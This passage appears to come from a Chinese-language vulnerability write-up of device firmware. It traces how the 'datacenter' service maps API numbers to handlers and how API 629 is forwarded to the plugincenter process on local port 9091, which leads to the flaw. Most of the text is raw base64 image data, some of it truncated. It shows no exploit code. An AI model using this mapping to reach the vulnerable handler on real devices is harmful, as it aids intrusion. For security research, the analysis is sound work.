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
|
|||
|
|
<p blockindex=45>在<code>datacenter</code>的<code>constructAPIMappingTable()</code>函数里分别执行了三个类的<code>sConstructMappingTable()</code>函数。</p>
|
|||
|
|
<p blockindex=46><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=47>其中,都是通过<code>STL map</code>建立起了<code>api</code>编号(下文解释)和对应的处理函数<code>handler</code>间的映射关系。具体来看,有一些<code>api</code>是直接在<code>datacenter</code>中被处理的,有些是被进一步转发到了<code>/usr/sbin/indexservice</code>(<code>9088</code>端口)处理,另外一些则是被转发到了<code>/usr/sbin/plugincenter</code>(<code>9091</code>端口)中进一步处理。</p>
|
|||
|
|
<p blockindex=48>我们在这里直接定位到该漏洞对应的<code>api</code>,在<code>datacenter::PluginApiCollection::sConstructMappingTable</code>中,当<code>api</code>为<code>629</code>的时候,对应的<code>handler</code>是<code>callPluginCenter</code>,其实从函数名就能看出来作用了,就是转发给<code>plugincenter</code>。</p>
|
|||
|
|
<p blockindex=49><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=50>进去简单看一下,的确是发送给了本地的<code>9091</code>端口(同样,容易在<code>plugincenter</code>程序中找到,其监听着<code>9091</code>端口)。</p>
|
|||
|
|
<p blockindex=51><img src="data:image/png;base64,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